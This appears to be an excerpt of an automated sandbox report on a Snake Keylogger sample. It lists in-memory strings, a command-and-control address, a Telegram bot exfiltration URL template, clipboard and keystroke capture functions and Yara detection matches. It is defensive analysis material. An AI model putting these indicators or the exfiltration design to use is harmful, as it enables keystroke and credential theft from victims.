Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20a
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000007.00000002.4503982433.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000303E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.000000000295E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.000000000303E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.4503982433.0000000003068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000003.00000002.4503499824.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002988000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000030D4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000003068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4507214361.0000000004013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000007.00000002.4503982433.00000000031E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000003.00000002.4503499824.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49844 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B1EAFF

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00B1ED6A
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FDED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00FDED6A

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

0_2_00B1EAFF

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_00B0AA57

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00B39576
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FF9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00FF9576

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: oagkiAhXgZ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: oagkiAhXgZ.exe, 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b5c12eee-9
Source: oagkiAhXgZ.exe, 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6ce066c7-c
Source: oagkiAhXgZ.exe, 00000000.00000003.2064930609.0000000003BB1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7bbdb9bd-5
Source: oagkiAhXgZ.exe, 00000000.00000003.2064930609.0000000003BB1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e56ea650-1
Source: reindulgence.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: reindulgence.exe, 00000002.00000000.2065227905.0000000001022000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0afb33e6-3
Source: reindulgence.exe, 00000002.00000000.2065227905.0000000001022000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4d84680d-4
Source: reindulgence.exe, 00000006.00000002.2261080017.0000000001022000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7c0ffe92-4
Source: reindulgence.exe, 00000006.00000002.2261080017.0000000001022000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7962a937-5
Source: oagkiAhXgZ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e536c391-a
Source: oagkiAhXgZ.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 